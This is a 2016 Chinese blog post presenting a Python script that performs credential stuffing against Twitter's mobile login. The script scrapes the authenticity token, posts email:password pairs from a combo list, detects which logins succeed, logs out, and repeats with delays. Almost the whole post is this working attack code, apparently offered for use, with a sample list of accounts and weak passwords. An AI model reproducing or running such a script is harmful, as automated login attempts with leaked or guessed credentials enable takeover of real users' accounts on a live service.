A-A+

Twitter推特登陆接口可撞库 Python代码

2016年03月29日 18:56 汪洋大海 暂无评论 阅读 1,089 views 次
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
  #!/usr/bin/env python
# encoding: utf-8
# email: ringzero@0x557.org
 
import json
import re
import requests
import time
 
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
 
requests = requests.Session()
 
headers = {
    'User-Agent': 'Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13',
    'accept-language': 'zh-CN,zh;q=0.8,en;q=0.6',
    'origin': 'https://mobile.twitter.com',
    'pragma': 'no-cache',
    'referer': 'https://mobile.twitter.com/login',
    'upgrade-insecure-requests': '1',
}
 
class Twitter_Login(object):
    """docstring for Twitter_Login"""
    def __init__(self):
        super(Twitter_Login, self).__init__()
        self.website = 'https://mobile.twitter.com'
 
    def parser_token(self, content):
        auth_token = re.search('authenticity_token" type="hidden" value="(.*?)"/>', content)
        return auth_token.group(1) if auth_token else None
 
    def init_token(self):
        url = '{0}/login'.format(self.website)
        content = requests.get(url, headers=headers, allow_redirects=True).content
        return content
 
    def parser_success(self, email, content):
        if email in content or '记录不匹配' in content:
            return False
        else:
            return True
 
    def session(self, token, email, password):
        payload = {
            'authenticity_token' : token,
            'session[username_or_email]' : email,
            'session[password]': password,
            'remember_me' : 1, 
            'wfa' : 1,
            'commit' :'登入',
        }
 
        url = '{0}/sessions'.format(self.website)
        result = requests.post(url,
            headers=headers,
            data=payload,
            allow_redirects=True)
        return result
 
    def run(self):
        session_content = self.init_token()
        userdict = [
            'ring05h@gmail.com:123456',
            'ring07h@gmail.com:123456',
            'ring08h@gmail.com:123456',
            'ring04h@gmail.com:truepassword',
            'ring09h@gmail.com:123456',
            'ring10h@gmail.com:123456',
            'ring11h@gmail.com:123456',
            'ring12h@gmail.com:123456',
            'ring13h@gmail.com:123456',
            'ring14h@gmail.com:123456',
            'ring15h@gmail.com:123456',
            'ring16h@gmail.com:123456',
            'ring17h@gmail.com:123456',
            'ring18h@gmail.com:123456',]
 
        for combo in userdict:
            token = self.parser_token(session_content)
            if token is not None:
                email, password = combo.split(':')
                print 'Starting check {0} : {1}'.format(email, password)
                session_content = self.session(token, email, password).content
                if self.parser_success(email, session_content):
                    print email, password, 'login success.'
                    self.destroy()
                    time.sleep(2)
                    session_content = self.init_token()
                time.sleep(3)
 
    def destroy(self):
        print 'call destroy()'
        url = '{0}/account'.format(self.website)
        content = requests.get(url, headers=headers, allow_redirects=True).content
        token = self.parser_token(content)
 
        if token is not None:
            # destroy logout
            url = '{0}/session/destroy'.format(self.website)
            payload = {
                'authenticity_token': token,
                'commit': '登出'
            }
            result = requests.post(url,
                headers=headers,
                data=payload,
                allow_redirects=True)
 
twitter = Twitter_Login()
twitter.run()
标签:

给我留言